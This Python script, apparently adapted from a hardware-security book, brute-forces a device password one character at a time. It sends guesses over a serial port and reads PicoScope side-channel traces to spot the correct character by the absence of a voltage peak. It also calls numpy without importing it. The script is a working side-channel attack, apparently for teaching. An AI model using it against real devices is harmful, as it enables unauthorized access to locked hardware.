# spacode_crack.py, based on scripts from the book.
import serial
import time
#picoscope module from https://github.com/colinoflynn/pico-python
from picoscope import ps2000a
import string
import sys

def fill_pass(pw):
    if len(pw) < 11:
        return pw + "a"*(11 - len(pw))
    else:
        return pw

def build_pass(cur_pw, idx):
    return fill_pass(cur_pw + string.ascii_lowercase[idx])

V_THRESHOLD=2.1
def test_capture(data, cur_n, sample_period):
    C=1/(8e6)*1e6;
    idx_low = round((18+8*C*cur_n)/(sample_period*1e6))
    idx_high = round((18+8*C*cur_n + 2*C)/(sample_period*1e6))

    for i in range(idx_low,idx_high):
        if data[i] > V_THRESHOLD:
            return False

    # We had no voltage peaks related to different character, means this is potentially the correct one.
    return True

#Adjust serial port as needed
try:
    ser = serial.Serial(
        port='/dev/ttyUSB0',
        baudrate=9600,
        timeout=0.500
    )
    ps = ps2000a.PS2000a()
    print("Found the following picoscope:")
    print(ps.getAllUnitInfo())

    # Need at least 30us from trigger (8MHz ATMEL)
    obs_duration = 35E-6

    # Sample at least 5000 points within that window
    sampling_interval = obs_duration / 5000

    # Cut-off for HP filter
    freq1 = 400e3
    # Cut-off for LP filter
    freq2 = 16e6

    # Turn channels C and D off
    ps.setChannel('C', enabled=False)
    ps.setChannel('D', enabled=False)

    # Configure timebase
    (actualSamplingInterval, nSamples, maxSamples) = \
    ps.setSamplingInterval(sampling_interval, obs_duration)
    print("Sampling interval = %f us" % (actualSamplingInterval * nSamples * 1E6))

    # Channel B is the trigger
    ps.setChannel('B', 'DC', 10.0, 0.0, enabled=True, BWLimited=True)
    ps.setSimpleTrigger('B', 2.0, 'Rising', delay=10, timeout_ms=5000, enabled=True)

    # 50mV range on channel B, AC coupled, 20MHz BW limit
    ps.setChannel('A', 'AC', 1, 0.0, enabled=True, BWLimited=True)

    data_list = []
    cur_pass = ""
    cur_n = 0

    #Clear system
    ser.write(("abcde\n").encode("utf-8"))
    ser.read(128)

    while True:
        # Try next character
        found = False
        for idx in range(len(string.ascii_lowercase)):
            pw_test = build_pass(cur_pass, idx)
            #print("Testing password: %s" % pw_test)
            ps.runBlock()
            time.sleep(0.05)

            ser.write((pw_test + "\n").encode("utf-8"))
            ps.waitReady()
            r=ser.read(128)
            #print("Got response: %s" % r)
            if b'Password OK' in r:
                print("Found password: " + pw_test)
                sys.exit(0)

            data = ps.getDataV('A', nSamples, returnOverflow=False)
            data = -1.0 * (data - np.mean(data)) / np.std(data)
            if test_capture(data, cur_n, actualSamplingInterval) == True:
                found = True
                cur_pass = cur_pass + string.ascii_lowercase[idx]
                cur_n += 1
                print("Current password: " + cur_pass)
                break

            # Continue trying another character.
        if not found:
            print("Error: failed to find the correct character at offset %d!" % cur_n)
            sys.exit(-1)

finally:
    #Always close off things
    ser.close()
    ps.stop()
    ps.close()